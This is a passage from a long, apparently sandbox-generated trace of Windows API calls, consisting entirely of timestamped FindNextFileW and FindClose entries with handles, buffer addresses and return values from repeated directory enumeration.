hFindFile=0x1c7fa8) returned 1 [0110.448] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0110.448] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0110.448] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0110.449] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0110.449] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0 [0110.449] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0110.449] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0110.449] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0110.449] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0110.450] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0110.450] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0 [0110.450] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0110.450] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0110.450] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0110.450] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0110.451] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0110.451] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0110.451] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0110.451] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0110.677] FindClose (in: hFindFile=0x1c7fe8 | out: 
hFindFile=0x1c7fe8) returned 1 [0110.677] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0 [0110.677] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0110.677] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0110.677] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0110.677] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 0 [0110.677] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0110.677] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0110.677] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0110.677] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0110.926] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0110.926] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0110.926] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0110.926] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 0 [0110.926] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0110.926] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0110.926] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0110.926] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 0 [0110.927] FindClose (in: hFindFile=0x1c9648 | out: hFindFile=0x1c9648) returned 1 [0110.927] FindNextFileW (in: hFindFile=0x1c9608, lpFindFileData=0x12f6dc | out: lpFindFileData=0x12f6dc) returned 1 [0110.927] FindClose (in: 
hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0110.927] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0110.927] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0110.927] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0110.928] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 0 [0110.928] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0110.928] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0110.929] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0110.929] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0110.929] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0110.929] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0110.930] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0110.930] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0110.930] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 0 [0110.930] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0110.931] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0110.931] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 0 [0110.931] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0110.931] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0110.972] FindNextFileW (in: hFindFile=0x1c9688, 
lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0110.995] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0110.995] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0110.995] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.016] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0111.017] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.024] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0111.025] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.025] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.026] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.034] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.034] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.036] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.036] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 0 [0111.036] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.036] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.037] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0111.037] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.037] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0111.037] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: 
lpFindFileData=0x12f418) returned 1 [0111.037] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.037] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 0 [0111.037] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.037] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.037] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0111.037] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.038] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0111.038] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.038] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 0 [0111.038] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.038] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.055] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.055] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.056] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.056] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0111.056] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.056] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0111.056] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.056] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) 
returned 0 [0111.057] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.057] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 0 [0111.057] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.057] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 0 [0111.057] FindClose (in: hFindFile=0x1c9648 | out: hFindFile=0x1c9648) returned 1 [0111.057] FindNextFileW (in: hFindFile=0x1c9608, lpFindFileData=0x12f6dc | out: lpFindFileData=0x12f6dc) returned 1 [0111.057] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.057] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.058] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0111.058] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.058] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0111.058] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0111.058] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0111.058] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.059] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0111.059] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0 [0111.059] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0111.059] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0111.059] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0111.059] FindNextFileW (in: hFindFile=0x1c9688, 
lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.059] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.059] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.060] FindClose (in: hFindFile=0x1c8068 | out: hFindFile=0x1c8068) returned 1 [0111.060] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 1 [0111.060] FindClose (in: hFindFile=0x1c8028 | out: hFindFile=0x1c8028) returned 1 [0111.060] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 0 [0111.060] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0111.060] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0111.060] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0111.061] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0 [0111.061] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0111.061] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0111.061] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0111.061] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0111.061] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0111.061] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.061] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0111.062] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.062] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0111.062] FindNextFileW (in: 
hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.062] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0111.062] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.066] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0111.066] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0111.066] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0111.066] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.066] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0111.066] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.068] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0111.069] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.069] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.069] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.070] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.070] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.070] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.070] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0111.070] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0111.070] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.098] FindClose (in: hFindFile=0x1c7f68 | out: 
hFindFile=0x1c7f68) returned 1 [0111.099] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.207] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0111.208] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.208] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.208] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.208] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.208] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.209] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.209] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0111.209] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0111.209] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0111.209] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.209] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0111.209] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.209] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0111.210] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.210] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0111.210] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 0 [0111.210] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.210] FindNextFileW (in: hFindFile=0x1c9648, 
lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.210] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0111.210] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.210] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0111.210] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.210] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.210] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.210] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.210] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.210] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.210] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.210] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.211] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0111.211] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0111.211] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0111.211] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.211] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.211] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.211] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0111.211] 
FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.211] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0111.211] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.212] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 0 [0111.212] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.212] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.212] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.212] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.212] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.212] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0111.212] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.212] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0111.212] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.212] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0111.212] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.213] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0111.213] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.213] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0111.213] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.213] FindClose (in: 
hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0111.213] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0111.214] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0111.214] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 0 [0111.214] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.214] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 0 [0111.214] FindClose (in: hFindFile=0x1c9648 | out: hFindFile=0x1c9648) returned 1 [0111.214] FindNextFileW (in: hFindFile=0x1c9608, lpFindFileData=0x12f6dc | out: lpFindFileData=0x12f6dc) returned 1 [0111.214] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.214] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.214] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.214] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.214] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0111.214] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.214] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0111.214] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.215] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0111.215] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 0 [0111.215] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.215] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: 
lpFindFileData=0x12f418) returned 1 [0111.215] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 0 [0111.215] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.215] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.215] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.215] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.215] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.216] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.216] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.216] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.216] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.216] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.216] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.216] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.216] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.216] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.216] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0111.217] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0111.217] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0111.217] FindClose (in: hFindFile=0x1c9688 | out: 
